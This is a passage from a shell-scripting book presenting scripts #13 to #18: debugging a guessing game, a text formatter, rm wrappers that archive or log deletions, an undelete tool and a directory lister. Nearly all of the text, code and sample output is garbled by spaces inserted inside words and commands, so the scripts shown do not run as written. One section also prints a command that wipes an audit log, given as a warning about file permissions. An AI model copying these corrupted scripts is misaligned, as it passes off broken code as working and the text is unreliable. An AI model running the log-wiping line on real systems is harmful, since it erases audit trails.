Y ou r v a lue i s t oo big : la rgest acc e p tab l e v al ue is 9 9 99
P le ase ent er a ye ar i n th e cor r ect f orm a t : 43 2
Y ou 're rig ht ! 4 32 was a l eap y e ar.
On your computer screen, the error messages just shown will be a bit more blunt because their words will be in bold,
and the correct guess of a leap year will be displayed in green.

#13 Debugging Shell Scripts


Although this section does not contain a true script per se, it's a good place to spend a few pages talking about some
of the basics of debugging and developing shell scripts, because it's a sure bet that bugs are going to creep in!
The best debugging strategy I have found is to build scripts incrementally. Some script programmers have a high
degree of optimism that everything will work right the first time, but I find that starting small, on a modest scale, can
really help move things along. Additionally, liberal use of ech o statements to track variables, and using the -x flag to
the shell for displaying debugging output, are quite useful. To see these in action, let's debug a simple numberguessing game.

The Code
# !/ bin / sh
# h ilo w -- A si mp le n umbe r-gue s sin g gam e
b ig ges t =10 0
g ue ss= 0
g ue sse s =0
n um ber = $(( $$ % $b igge st)

#
#
#
#

m ax im um nu mb e r p os si b le
g ue ss ed by p l ay e r
n um be r o f gu e ss e s ma d e
r an do m n um be r , b et we e n 1 a nd $ b ig ge s t

w hi le [ $g ue ss -n e $n umbe r ] ; do
e cho -n "G ues s? " ; rea d ans w er
i f [ "$g ue ss" - lt $ numb er ] ; th e n
ec h o " .. . b ig ger! "
e lif [ " $g ues s" -gt $nu mber ] ; t h en
ec h o " .. . s ma ller !
fi
g ues s es= $( ($g ue sses + 1 ))
d on e
e ch o " R igh t! ! G ue ssed $nu mber i n $ g u ess e s g ue ss e s. "
e xi t 0

Running the Script


The first step in debugging this game is to test and ensure that the number generated will be sufficiently random. To do
this, we take the process ID of the shell in which the script is run, using the $ $ notation, and reduce it to a usable
range using the % mod function. To test the function, enter the commands into the shell directly:
$ e cho $(( $$ % 10 0))
5
$ e cho $(( $$ % 10 0))
5
$ e cho $(( $$ % 10 0))
5
It worked, but it's not very random. A moment's thought reveals why that is: When the command is run directly on the
command line, the PID is always the same. When run in a script, the command is in a different subshell each time, so
the PID varies.
The next step is to add the basic logic of the game. A random number between 1 and 100 is generated, the player
makes guesses at the number, and after each guess the player is told whether the guess is too high or too low until he
or she figures out what number it is. After entering all the basic code, it's time to run the script and see how it goes,
using exactly the code just shown, warts and all:
$ h ilo w
. /0 13- h ilo w. sh: l ine 19: unexp e cte d EOF w hi le l o ok in g f o r ma t ch in g ` "'
. /0 13- h ilo w. sh: l ine 22: synta x er r o r: u n ex pe ct e d en d o f f il e
Ugh; the bane of shell script developers: an unexpected EOF. To understand what this message means, recall that
quoted passages can contain newlines, so just because the error is flagged on line 19 doesn't mean that it's actually
there. It simply means that the shell read merrily along, matching quotes (incorrectly) until it hit the very last quote, at
which point it realized something was amiss. In fact, line 19 is perfectly fine:

$ s ed - n 1 9p hi lo w
e ch o " R igh t! ! G ue ssed $nu mber i n $ g u ess e s g ue ss e s. "
The problem, therefore, must be earlier in the script. The only really good thing about the error message from the shell
is that it tells you which character is mismatched, so I'll use gre p to try to extract all lines that have a quote and then
screen out those that have two quotes:
$ g rep '"' 0 13- hi low. sh | egre p -v ' .*" . * ". *'
e ch o " . .. sm all er !
That's it: The close quote is missing. It's easily fixed, and we're ready to go:
$ h ilo w
. /0 13- h ilo w. sh: l ine 7: u nexpe c ted E OF w h il e lo o ki ng fo r m at c hi ng `) '
. /0 13- h ilo w. sh: l ine 22: synta x er r o r: u n ex pe ct e d en d o f f il e
Nope. Another problem. Because there are so few parenthesized expressions in the script, I can eyeball this problem
and ascertain that somehow the closing parenthesis of the instantiation of the random number was mistakenly
truncated, as the following line shows:
n um ber = $(( $ $ % $ bigg est
)
# r an do m n um b er , b et w ee n 1 a nd $b ig g es t
This is fixed by adding the closing parenthesis. Now are we ready to try this game? Let's find out:
$ h ilo w
G ue ss? 33
. .. bi g ger !
G ue ss? 66
. .. bi g ger !
G ue ss? 99
. .. bi g ger !
G ue ss? 100
. .. bi g ger !
G ue ss? ^C
Because 100 is the maximum possible value, there seems to be a logic error in the code. These errors are particularly
tricky because there's no fancy gr ep or se d invocation to identify the problem. Look back at the code and see if you
can identify what's going wrong.
To try and debug this, I'm going to add a few e c ho statements in the code to output the number chosen and verify that
what I entered is what's being tested. The relevant section of the code is
e cho -n "G ues s? " ; rea d ans w er
i f [ "$g ue ss" - lt $ numb er ] ; th e n
In fact, as I modified the e cho statement and looked at these two lines, I realized the error: The variable being read is
a ns wer , but the variable being tested is called g u e ss. A bonehead error, but not an uncommon one (particularly if
you have oddly spelled variable names). To fix this, I change r e ad a ns w er to r ea d g ue ss .

The Results
Finally, it works as expected.
$ h ilo w
G ue ss? 50
. .. bi g ger !
G ue ss? 75
. .. bi g ger !
G ue ss? 88
. .. sm a lle r!
G ue ss? 83
. .. sm a lle r!
G ue ss? 80
. .. sm a lle r!
G ue ss? 77
. .. bi g ger !
G ue ss? 79
R ig ht! ! Gu es sed 7 9 in 7 g uesse s .

Hacking the Script


The most grievous bug lurking in this little script is that there's no checking of input. Enter anything at all other than an

integer and the script spews up bits and fails. Including a rudimentary test could be as easy as adding the following
lines of code:
i f [ - z "$ gu ess " ] ; then
e cho "Pl ea se en ter a nu mber. Use ^ C t o qu it "; co nt i nu e ;
fi
However, a call to the v al idin t function shown in Script #5 is what's really needed.

Chapter 2: Improving on User Commands


Overview
A typical Unix or Linux system includes hundreds of commands, which, when you factor in starting flags and the
combinations of commands possible with pipes, should produce millions of different ways to work on the command line.
Plenty of choices for anyone, right? Well, no. In fact, for all its flexibility, you can't always get what you want.
Unlike other operating systems, however, with Unix you can usually cobble together something that'll do the trick quite
easily, whether it's downloading some nifty new version of a utility with additional capabilities (particularly from the great
GNU archive at htt p: //w ww .gnu .org /), creating some aliases, or dipping your toe into the shell scripting pond.
But before we go any further, here's a bonus script. If you're curious about how many commands are in your PATH,
this simple shell script will do the trick:
# !/ bin / sh
# H ow m any c omm an ds: a si mple s cri p t to c ou nt h o w ma n y e xe cu t ab le
#
co m man ds ar e in y our curre n t P A T H.
m yP ATH = "$( ec ho $P ATH | se d -e ' s/ / ~ ~/g ' -e ' s/ : / /g ' )"
c ou nt= 0 ; no nex =0
f or di r nam e in $m yPAT H ; do
d ire c tor y= "$( ec ho $ dirn ame | sed ' s/~ ~ / / g' )"
i f [ -d "$ dir ec tory " ] ; the n
fo r co mm and i n $( ls " $dire c tor y " ) ; d o
i f [ - x " $d irec tory /$com m and " ] ; t he n
co un t=" $( ($co unt + 1)) "
e lse
no ne x=" $( ($no nex + 1)) "
fi
do n e
fi
d on e
e ch o " $ cou nt co mm ands , an d $no n ex e n tri e s t ha t w er en ' t e xe cu t ab le "
e xi t 0
This script counts the number of executable files, rather than just the number of files, and reveals that Red Hat Linux 8
ships with 1,203 commands and 4 nonexecutables in a standard PATH, Mac OS X (10.2, with the developer options
installed) has 1,088 commands and 25 nonexecutables, and Solaris 9 has an impressive 1,700 commands with 42
nonexecutables in the default PATH.
The scripts explored in this chapter are all similar to the simple script just given in that they add fun or useful features
and capabilities without an overly high degree of complexity. Some of the scripts accept different command flags to
allow even greater flexibility, and some also demonstrate how a shell script can be used as a wrapper, a program that
intercedes to allow users to specify commands or command flags in a familiar notation and then translates those flags
into the proper format and syntax required by the actual Unix command.
There's no question that the different flavors of Linux and Unix offer a large number of commands and executable
scripts. Do we really need to add new ones? The answer is really based on the entire Unix philosophy: Unix is built
upon the idea that commands should do one thing, and do it well. Word processors that have spell-check, find-file, and
email capabilities might work well in the Windows and Macintosh world, but on the command line, each of these
functions should be separate and discrete. There are lots of advantages to this strategy, the most important being that
each function can then be modified and extended individually, giving all applications that utilize it access to its new
capabilities.
This strategy holds true across the board with Unix, and that's why the scripts in this chapter and throughout the
book not only are helpful, but are a logical extension of the entire Unix philosophy. After all, 'tis better to extend and
expand than to build complex, incompatible versions of commands for your own installation.

#14 Formatting Long Lines


If you're lucky, your Unix system already includes the f m t command, a program that's remarkably useful if you work
with text with any frequency. From reformatting email to filling in paragraphs in documents (that is, making sure that as
many words as possible are on each line of the text), fm t is a helpful utility to know.
But some Unix systems don't include fm t, particularly legacy systems at universities, which often have a fairly
minimalistic implementation. As it turns out, the n rof f command, which has been part of Unix since the very
beginning, can be utilized in a short shell script to achieve the same result of wrapping long lines and filling in short
lines to even up line lengths.

The Code
# !/ bin / sh
# A ve r sio n of fm t, u sing nrof f . A d d s t w o u se fu l f la g s: -w X fo r l in e w id th
#
an d -h t o e na ble hyph enati o n f o r be t t er f il l s.
w hi le g eto pt s " hw :" o pt; do
c ase $op t in
h) hyp h= 1
;;
w) wid th ="$ OP TARG "
;;
e sac
d on e
s hi ft $ (($ OP TIN D - 1) )
n ro ff < < E OF
. ll ${ w idt h: -72 }
. na
. hy ${ h yph :- 0}
. pl 1
$ (c at " $@" )
E OF
e xi t 0

How It Works
This succinct script offers two different command flags, - w X to specify that lines should be wrapped when their width
exceeds X characters (the default is 72) and - h to enable hyphenation, filling the lines more and improving the final
results. Notice the test to check for starting flags: A w hil e loop uses ge t op t s to step through the options, then
uses s h ift $ (($ OP TIN D - 1) ) to throw all the arguments away once they've been processed.
The other, perhaps more important technique demonstrated here is the use of a here document to feed multiple lines
of input to a command. The odd double-input-redirect sequence n ro ff << EO F allows you to easily have a here
document, a section of the script that's treated as if it were typed in on the command line. Using the here document, the
script outputs all of the necessary n roff commands and then calls the c at command with the requested filename or
filenames to process. The ca t command's output is then fed directly to n r of f . This is a technique that will appear
frequently in the scripts presented in this book, and it's one well worth experimenting with!

Running the Script


This script can be included in a pipe, or it can have filenames specified on the command line, but usually it would be
part of an external pipe invoked from within an editor like vi or v i m (e.g., !} f mt ) to format a paragraph of text.

The Results
The following example enables hyphenation and specifies a maximum width of 50 characters:
$ f mt - h - w 50 01 4-ra gged .txt
S o she sat o n, wi th c lose d eye s , a n d ha l f b el ie v ed
h er sel f in W ond er land , th ough s he k n ew s h e ha d b ut
t o ope n th em ag ai n, a nd a ll wo u ld c h ang e to d ul l

r ea lit y --t he gr as s wo uld be on l y r u s tli n g i n th e


w in d, a nd th e p oo l ri ppli ng to the w avi n g o f th e
r ee ds- - the r att li ng t eacu ps wo u ld c h ang e to t in k li ng s hee p- bel ls , an d th e Que e n's s hri l l c ri es
t o the voi ce of t he s heph erd b o y-- a n d t h e s ne ez e
o f the bab y, th e shri ek o f the Gry p h on, a nd a ll
t he ot h er qu eer n oise s, w ould c han g e (s h e k ne w) to
t he co n fus ed cl am our of t he bu s y f a r m-y a r d- -w hi l e
t he lo w ing o f t he cat tle in th e di s t anc e wo ul d
t ak e t h e p la ce of the Moc k Tur t le' s hea v y s ob s.
Compare this with the following ouput, generated using the default width and no hyphenation:
$ f mt 0 14- ra gge d. txt
S o she sat o n, wi th c lose d eye s , a n d ha l f b el ie v ed h e rs e lf i n
W on der l and , tho ug h sh e kn ew sh e ha d but t o op en th em ag a in , a nd a l l
w ou ld c han ge to d ull real ity-- t he g r ass w ou ld b e o nl y r u st li n g in th e
w in d, a nd th e p oo l ri ppli ng to the w avi n g o f th e r ee d s- - th e r at tl i ng
t ea cup s wo ul d c ha nge to t inkli n g s h e ep- b e ll s, a n d th e Q u ee n' s s hr i ll
c ri es t o t he vo ic e of the shep h erd b oy- - a nd t he sn ee z e o f th e b ab y , th e
s hr iek of th e G ry phon , an d all the o the r qu ee r n oi se s , w ou ld ch an g e (s h e
k ne w) t o t he co nf used cla mour o f t h e bu s y f ar m- y ar d- - wh i le t h e lo w in g o f
t he ca t tle i n t he dis tanc e wou l d t a k e t h e p la ce of t h e M oc k T ur tl e 's
h ea vy s obs .

#15 Archiving Files As They're Removed


One of the most common problems that users have with Unix, in my experience, is that there is no way to recover a file
or folder that has been accidentally removed. No Norton Unerase, no Mac OS X shareware utility, nada. Once you
press RETURN after typing r m xy z, it's history.
A solution to this problem is to secretly and automatically archive files and directories to a . de le t ed -f i le s
archive. With some fancy footwork in a script, this can be made almost completely invisible to users.

The Code
# !/ bin / sh
# n ewr m , a r epl ac emen t fo r the exi s t ing r m co mm a nd , p ro v id es a
#
ru d ime nt ary u nrem ove capab i lit y by c r ea ti ng an d u ti l iz in g a n e w
#
di r ect or y w it hin the user' s ho m e di r e ct or y. It c a n h an dl e d ir e ct or i es
#
of con te nt as wel l as indi v idu a l fi l e s, a nd if t h e u se r s pe ci f ie s
#
th e -f f lag f iles are remo v ed a n d N O T a rc hi v ed .
# B ig I mpo rt ant W arni ng: You'l l wa n t a c r on j ob or s o me t hi ng si mi l ar t o k ee p
#
th e tr as h d ir ecto ries tame d . O t h erw i s e no th i ng w i ll ev er ac tu a ll y
#
be del et ed fr om t he s ystem and y ou' l l r un o u t of di s k sp a ce !
my dir = "$H OM E/. de lete d-fi les"
r ea lrm = "/b in /rm "
c opy = "/b in /cp - R"
i f [ $ # -e q 0 ] ; the n # let ' r m' o u ptu t th e us a ge e r ro r
e xec $re al rm # our shel l is r epl a c ed b y / bi n/ r m
fi
# P ars e al l opt io ns l ooki ng fo r '- f '
f la gs= " "
w hi le g eto pt s " df iPRr vW" opt
do
c ase $op t in
f) exe c $re al rm " $@"
*) fla gs ="$ fl ags -$op t"
e sac
d on e
s hi ft $ (($ OP TIN D - 1) )

;;
;;

# exe c le ts u s e xi t t h is s c ri pt di re c tl y.
# oth e r f la gs ar e f or 'r m' , n ot us

# M ake sur e tha t the $myd ir ex i sts


i f [ ! -d $m ydi r ] ; then
i f [ ! - w $HO ME ] ; the n
ec h o " $0 fa il ed: can' t cre a te $ m ydi r in $ HO M E" > & 2
ex i t 1
fi
m kdi r $m yd ir
c hmo d 70 0 $my di r
# a li t tle b it o f p ri va c y, p l ea s e
fi
f or ar g
do
n ewn a me= "$ myd ir /$(d ate "+%S. % M.% H . %d. % m ") .$ (b a se na m e " $a rg " )"
i f [ -f "$ arg " ] ; then
$c o py "$ arg " "$ne wnam e"
e lif [ - d "$a rg " ] ; th en
$c o py "$ arg " "$ne wnam e"
fi
d on e

e xe c $ r eal rm $f la gs " $@"

# o u r s h e ll i s r ep la c ed by r e al rm

How It Works
There are a bunch of cool things to consider in this script, not the least of which is the significant effort it goes through
to ensure that users aren't aware it exists. Notice that error messages are almost always generated by a call to
r ea lrm with whatever bad flags or file/directory names were specified. Also, the ex ec command, which replaces the
current process with the new process specified, is a convenience. As soon as e xe c invokes r e al rm , it effectively
exits the script, and we have the added side benefit of ensuring that the return code from the re al r m process
(/ bin / rm) is given to the invoking shell, not lost.
Because this script secretly creates a directory in the user's home directory, it needs to ensure that the files therein
aren't suddenly readable by others simply because of a badly set um as k value. To accomplish this, the script uses
c hm od to ensure that the directory is set to read+write+execute for the user, and closed for everyone else.
Finally, the somewhat confusing file-naming convention uses bas e na m e to strip out any directory information from the
file's path, and adds a time and date stamp to every deleted file in the form second.minute.hour.day.month.filename:
n ew nam e ="$ my dir /$ (dat e "+ "%S.% M .%H . % d.% m " ). $( ba s en am e " $ ar g" ) "
Notice the use of multiple $() elements in the same substitution. It's a bit complicated, perhaps, but helpful
nonetheless. Remember, anything between $ ( and) is fed to a subshell, and the result of that command is what's
substituted. Why bother with a timestamp? To enable our archive to store multiple files that could potentially have the
same name prior to being deleted.

Running the Script


To install this script, simply add an alias, so that when you type r m you really get to this script, not to the / b in /r m
command. A Bash/Ksh alias would look like this:
a li as r m=y ou rpa th /new rm

The Results
The results of running this script are subtle and hidden from immediate view, so let's keep an eye on the .d el e te df il es directory along the way:
$ l s ~ / .de le ted -f iles
l s: /U s ers /t ayl or /.de lete d-fil e s/: N o s u c h fi le or d i re c to ry
$ n ewr m fi le -to -k eep- fore ver
$ l s ~ / .de le ted -f iles /
5 1. 36. 1 6.2 5. 03. fi le-t o-ke ep-fo r eve r
Exactly right. While the file was deleted from the local directory, a copy of it was secretly squirreled away to the
. de let e d-f il es directory, with an appropriate date/ time stamp to allow other deleted files with the same name to
be stored in the same directory.

#16 Working with the Removed File Archive


Now that a directory of deleted files and directories is hidden within the user's account home, a script to let the user
pick and choose between these deleted files would clearly be useful. However, it's quite a task to address all the
possible situations, ranging from no matches to one match to more than one match. In the case of more than one
match, for example, do you automatically pick the newest file to undelete? Indicate how many matches there are and
quit? Present data on the different versions and let the user pick? Let's see what we can do....

The Code
# !/ bin / sh
# u nrm - S ea rch es the del eted f ile s arc h i ve f or th e s pe c if ie d f il e o r d ir ec t or y.
#
If the re is m ore than one m atc h i ng r e su lt , s ho ws a l is t o f th e r es u lt s,
#
or d ere d by ti mest amp, and l ets t he u s er s pe c if y w hi c h on e t o r es to r e.
m yd ir= " $HO ME /.d el eted -fil es"
r ea lrm = "/b in /rm "
m ov e=" / bin /m v"
d es t=$ ( pwd )
i f [ ! -d $m ydi r ] ; then
e cho "$0 : No de lete d fi les d i rec t o ry: n ot hi ng to u n rm " > &2 ; ex i t 1
fi
c d $my d ir
i f [ $ # -e q 0 ] ; the n # no ar g s, j u st s h ow l is t in g
e cho "Co nt ent s of y our delet e d f i l es a r ch iv e ( so rt e d b y da t e) :"
l s - F C | s ed -e 's/ \([[ :digi t :]] [ [ :di g i t: ]] \. \ )\ {5 \ }/ / g' \
-e 's/ ^/ /'
e xit 0
fi
# O the r wis e we mu st h ave a use r -sp e c ifi e d p at te r n to wo r k wi t h. L e t' s s ee i f t he
# p att e rn ma tch es mor e th an on e fi l e or d ir ec to r y in th e a rc h iv e.
m at che s ="$ (l s * "$ 1" 2 > /d ev/nu l l | w c - l ) "
i f [ $ m atc he s - eq 0 ] ; t hen
e cho "No m atc h for \"$1 \" in the d ele t e d fi le ar ch i ve . " >& 2
e xit 1
fi
i f [ $ m atc he s - gt 1 ] ; t hen
e cho "Mo re th an one fil e or d ire c t ory m at ch i n t he ar c hi ve : "
i nde x =1
f or n ame i n $ (l s -t d *" $1")
do
da t eti me ="$ (e cho $nam e | c u t - c 1 -14 | \
awk - F. '{ pri nt $ 5"/"$ 4 " a t "$3 " : "$ 2" :" $ 1 }' ) "
if [ - d $na me ] ; the n
s ize =" $(l s $nam e | wc -l | s e d 's / [ ^[ :d ig i t: ]] / /g ' )"
e cho " $i nd ex)
$1
(co n ten t s = $ { si ze } i te ms , d e le te d = $ d at et i me )"
el s e
s ize =" $(l s -sdk 1 $n ame | awk ' {pr i n t $1 }' ) "
e cho " $i nd ex)
$1
(si z e = $ {si z e }K b, d e le te d = $d at e ti me ) "
fi
in d ex= $( ($i nd ex + 1))
d one
e cho ""
e cho -n "W hic h vers ion of $1 do y o u w a n t to r e st or e ( ' 0' t o q ui t )? [ 1 ] : "
r ead des ir ed
i f [ ${d es ire d: =1} -ge $inde x ] ; the n
ec h o " $0 : R es tore can celed by u s er: i nd ex v a lu e t oo bi g. " > &2

fi

ex i t 1

i f [ $de si red - lt 1 ] ; then


ec h o " $0 : r es tore can celed by u s er. " >& 2 ; e xi t 1
fi
r est o re= "$ (ls - td1 *"$1 " | s e d - n "${ d e si re d} p ") "
i f [ -e "$ des t/ $1" ] ; then
ec h o " \" $1\ " alre ady exist s in t his d ir ec to r y. C a nn o t ov e rw ri t e. " > &2
ex i t 1
fi
e cho -n "R est or ing file \"$1 \ " . . . "
$ mov e "$ re sto re " "$ dest /$1"
e cho "do ne ."
e cho -n "D ele te the add ition a l c o p ies o f th is fi le ? [ y ] "
r ead ans we r
i f [ ${a ns wer := y} = "y" ] ; t hen
$r e alr m -rf * "$1"
ec h o " de let ed ."
e lse
ec h o " ad dit io nal copi es re t ain e d ."
fi
e ls e
i f [ -e "$ des t/ $1" ] ; then
ec h o " \" $1\ " alre ady exist s in t his d ir ec to r y. C a nn o t ov e rw ri t e. " > &2
ex i t 1
fi
r est o re= "$ (ls - d *" $1") "

fi

e cho -n "R est or ing file \"$1 \ " . . . "


$ mov e "$ re sto re " "$ dest /$1"
e cho "do ne ."

e xi t 0

How It Works
The first chunk of code, the i f [$# -eq 0 ] conditional block, executes if no arguments are specified, displaying
the contents of the deleted files archive. However, there's a catch. We can't display the actual filenames because we
don't want the user to see the timestamp data used internally to guarantee unique filenames. In order to display this
data in a more attractive format, the s ed statement deletes the first five occurrences of digit digit dot in the ls output.
If an argument is specified, it is the name of a file or directory to recover. The next step is to ascertain how many
matches there are for the name specified. This is done with the following statement:
m at che s ="$ (l s * "$ 1" 2 > /d ev/nu l l | w c - l ) "
The unusual use of quotes in the argument to ls ensures that this pattern will match filenames that have embedded
spaces, while the '* ' wildcard pattern is expanded properly by the shell. The 2 > / d ev /n u ll ensures that any
error resulting from the command is discarded rather than shown to the user. The error that's being discarded is most
likely No such file or directory, caused when no match for the specified filename is found.
If there are multiple matches for the file or directory name specified, the most complex part of this script, the if [
$ ma tch e s - gt 1 ] block, is executed, displaying all the results. Using the - t flag to the l s command in the
main f o r loop causes the archive files to be presented from newest to oldest, and a succinct call to the a wk
command translates the date/time stamp portion of the filename into the deleted date and time information in the
parentheses. The inclusion of the -k flag to l s in the size calculation forces the file sizes to be represented in
kilobytes:
s iz e=" $ (ls - sdk 1 $nam e | awk ' { pri n t $1 } ' )"
Rather than displaying the size of matching directory entries, which would be meaningless, the script displays the

number of files within each matching directory. The number of entries within a directory is actually quite easy to
calculate, and we chop the leading spaces out of the w c command output, as follows:
s iz e=" $ (ls $ nam e | wc -l | sed 's/ [ ^ [:d i g it :] ]/ / g' )"
Once the user specifies one of the possible matching files or directories, the corresponding exact filename is identified
by the following statement:
r es tor e ="$ (l s - td 1 *" $1" | sed -n " $ {de s i re d} p" ) "
This statement contains a slightly different use of s ed. Specifying the - n flag and then a number ($ {d e si re d })
followed by the p print command is a very fast way to extract only the specified line number from the input stream.
The rest of the script should be fairly self-explanatory. There's a test to ensure that u nr m isn't going to step on an
existing copy of the file or directory, and then the file or directory is restored with a call to /b i n/ mv . Once that's
finished, the user is given the chance to remove the additional (probably superfluous) copies of the file, and the script is
done.

Running the Script


There are two ways to work with this script. First, without any arguments, it'll show a listing of all files and directories in
the deleted files archive for the specific user. Second, with a desired file or directory name as the argument, the script
will either restore that file or directory (if there's only one match) or show a list of candidates for restoration, allowing
the user to specify which version of the deleted file or directory to restore.

The Results
Without any arguments specified, the script shows what's in the deleted files archive:
$ u nrm
C on ten t s o f you r dele ted files arc h i ve ( s or te d b y da t e) :
d eit r us
thi s is a te s t
d eit r us
gar b age
When a filename is specified, the script displays more information about the file, as follows:
$ u nrm dei tr us
M or e t h an on e f il e or dir ector y ma t c h i n th e ar c hi ve :
1)
d eit ru s
(s ize = 76 88Kb, del e t ed = 11 /2 9 a t 10 : 00 : 12 )
2)
d eit ru s
(s ize = 4K b, de l ete d = 1 1 / 29 a t 0 9: 59 : 51 )
W hi ch v ers io n o f deit rus do yo u wa n t to r es to re (' 0' to qu it ) ? [1 ] : 0
u nr m: r est or e c an cele d by user .

Hacking the Script


If you implement this script, there's a lurking danger that's worth raising. Without any controls or limits, the files and
directories in the deleted files archive will grow without bounds. To avoid this, invoke f i nd from within a c ro n job to
prune the deleted files archive. A 14-day archive is probably quite sufficient for most users and will keep things
reasonably in check.

#17 Logging File Removals


This script is an example of an entire class of useful shell scripts called wrappers. The basic idea of wrappers is that
they live between an actual Unix command and the user, offering the user different and useful functionality not available
with the actual command alone. In the case of this script, file deletions using the r m command will actually be logged in
a separate log file without notifying the user.

The Code
# !/ bin / sh
#
log r m - L ogs a ll f ile delet i on r e que s t s un le s s th e - s f la g i s u se d.
r em ove l og= "/ var /l og/r emov e.log "
i f [ $ # -e q 0 ] ; the n
e cho "Us ag e: $0 [-s ] li st of fil e s or d ir ec to r ie s" >& 2
e xit 1
fi
i f [ " $ 1" = "-s " ] ; then
# si l ent o per at ion requ ested ... d on' t lo g
s hif t
e ls e
e cho "$( da te) : ${US ER}: $@" > > $ r e mov e l og
fi
/ bi n/r m "$ @"
e xi t 0

Running the Script


Rather than give this script a name like logr m , a typical way to install a wrapper program is to rename the underlying
program and then install the wrapper using the underlying program's old name. If you choose this route, make sure that
the wrapper invokes the newly renamed program, not itself. For example, if you rename / b in /r m to /b in / rm .o l d
and name this script /b in/ rm , the last few lines of the script will need to be changed so that it invokes
/ bi n/r m .ol d, not itself!
You can also use an alias to have this script wrap a standard call to r m :
a li as r m=l og rm
In either case, you will, of course, need write and execute access to / va r /l o g, which might not be the default
configuration on your particular Unix or Mac OS X system.

The Results
Let's create a few files to delete, delete them, and then examine the remove log:
$ t ouc h un us ed. fi le c iao. c /tm p /ju n k it
$ l ogr m un us ed. fi le / tmp/ junki t
$ l ogr m ci ao .c
$ c at / var /l og/ re move .log
T hu Ju l
3 1 1:3 2: 05 M DT 2 003: s usa n : /t m p /c en tr a l. lo g
F ri Ju l
4 1 4:2 5: 11 M DT 2 003: t ayl o r : u n u se d. fi l e /t m p/ j un ki t
F ri Ju l
4 1 4:2 5: 14 M DT 2 003: t ayl o r : c i a o. c
Aha! Notice that on the previous day user sus a n deleted the file / tm p/ c en t ra l. l og .

Hacking the Script


There's a potential log file ownership permission problem here too. Either the r e mo v e. lo g file is writable by all, in
which case a user could clear its contents out with a command like ca t / de v /n u ll >
/ va r/l o g/r em ove .l og, or it isn't writable by all, in which case the script can't log the events. You could use a
s et uid permission so that the script runs with the same permissions as the log file, but there are two problems with

this. First, it's a really bad idea! Never run shell scripts under set u id ! Second, if that's not enough of a reason, you
could get into a situation where the users have permission to delete their files but the script doesn't, and because the
effective uid set with the s et uid would be inherited by the r m command itself, things would break and there would
be great confusion when users couldn't remove their own files, even when they check and see that they own the files in
question.
Two other possible solutions to this problem are worth mentioning. First, if you have an ext2 or ext3 file system
(probably Linux), you can use the ch attr command to set a specific append-only file permission on the log file and
then leave it writable to all without any danger. Second, you can write the log messages to s ys l og , using the helpful
l og ger command. To log the rm commands with lo g g er is straightforward:
l og ger -t lo grm " ${US ER:- LOGNA M E}: $ *"
This adds an entry to the s yslo g data stream (untouchable by regular users) that is tagged with lo g rm , the
username, and the command specified.
Syslog nuances to watch for

If you opt for this approach, you'll want to check s ys l og d( 8 )


to ensure that your configuration doesn't discard
u s er. n o ti ce priority log events (it's almost always specified
in the / e t c/ s ys l og d .c on f file).

#18 Displaying the Contents of Directories


While the ls command is a cornerstone of working with the Unix command line, there's one element of the command
that's always seemed pointless to me: indicating the size of a directory. When a directory is listed, the program either
lists the directory's contents file by file or shows the number of 1,024-byte blocks required for the directory data. A
typical entry in an ls -l output might be
d rw xrw x r-x
2 t aylo r
tayl o r
4 0 9 6 Oc t 2 8 19 : 07 bi n
But that's really not very useful, because what I want to know is how many files are in the specified directory. That's
what this script accomplishes, generating a nice multicolumn listing of files and directories that shows file size with file
entries and the number of files with directory entries.

The Code
# !/ bin / sh
# f orm a tdi r - O ut puts a d irect o ry l i sti n g i n a f ri en d ly an d u se fu l f or m at .
g mk ()
{
# Gi v en in put i n Kb , ou tput i n K b , Mb , or G b f or b e st ou tp u t fo r ma t
i f [ $1 -g e 1 00 0000 ] ; then
ec h o " $( scr ip tbc -p 2 $1 / 100 0 0 00) G b "
e lif [ $ 1 -ge 1 000 ] ; then
ec h o " $( scr ip tbc -p 2 $1 / 100 0 ) Mb"
e lse
ec h o " ${ 1}K b"
fi
}
i f [ $ # -g t 1 ] ; the n
e cho "Us ag e: $0 [di rnam e]" > & 2; e x it 1
e li f [ $# -e q 1 ] ; t hen
c d " $ @"
fi
f or fi l e i n *
do
i f [ -d "$ fil e" ] ; the n
si z e=$ (l s " $f ile" | w c -l | se d 's/ [ ^ [: di gi t :] ]/ / g' )
if [ $ si ze -e q 1 ] ; then
e cho " $fi le ($s ize entry ) |"
el s e
e cho " $fi le ($s ize entri e s)| "
fi
e lse
si z e=" $( ls -s k "$ file " | a w k ' { p rin t $1 }' )"
ec h o " $f ile ( $(gm k $s ize)) | "
fi
d on e | \
s ed ' s/ /^ ^^/ g'
| \
x arg s -n 2
| \
s ed ' s/\ ^\ ^\^ / /g' | \
a wk - F\| ' { p ri ntf "%-3 9s %- 3 9s\ n " , $ 1 , $ 2 }'
e xi t 0

How It Works
One of the most interesting parts of this script is the g m k function, which, given a number in kilobytes, outputs that
value in kilobytes, megabytes, or gigabytes, depending on which unit is most appropriate. Instead of having the size of
a very large file shown as 2083364KB, for example, this function will instead show a size of 2.08GB. Note that gm k is
called with the $ () notation in the following line:
e ch o " $ fil e ($( gm k $s ize) )|"

Because the arguments within the $() sequence are given to a subshell of the running script shell, subshells
automatically inherit any functions defined in the running shell.
Near the top of the script, there is also a shortcut that allows users to specify a directory other than the current
directory and then changes the current working directory of the running shell script to the desired location, using c d .
This follows the mantra of good shell script programming, of course: Where there's a shortcut, there's a better way.
The main logic of this script involves organizing the output into two neat, aligned columns. You can't make a break at
spaces in the output stream, because files and directories can have spaces within their names. To get around this
problem, the script first replaces each space with a sequence of three carets (^ ^ ^). Then it uses the x ar g s command
to merge paired lines so that every two lines become one line separated by a space. Finally, it uses the aw k command
(rather than pa st e, which would just intersperse a tab, which rarely, if ever, works out properly because p as t e
doesn't take into account variation in entry width) to output columns in the proper alignment.
Notice how the number of (nonhidden) entries in a directory is easily calculated, with a quick se d invocation cleaning
up the output of the w c command:
s iz e=$ ( ls "$ fil e" | w c -l | se d 's / [ ^[: d i gi t: ]] / /g ')

Running the Script


For a listing of the current directory, invoke the command without arguments. For information about the contents of a
particular directory, specify a directory name as the sole command argument.

The Results
$ f orm a tdi r ~
A pp lic a tio ns (0 e ntri es)
D EM O ( 5 en tr ies )
D oc ume n ts (3 8 e nt ries )
I nt erm e dia te HTM L (3 e ntri es)
M ov ies (1 en try )
N et Inf o (9 e ntr ie s)
P ub lic (1 en try )
S ha red (4 en tri es )
X D esk t op (4 Kb)
b in (3 1 en tr ies )
c bh ma. t ar. gz (3 76 Kb)
f ir e a l ias es (4 Kb )
j un k ( 4 Kb)
m ai l ( 2 en tr ies )
s cr ipt s .ol d (46 e ntri es)
t es tfe a tur es .sh ( 4Kb)
t we akm k tar gs .c (4 Kb)

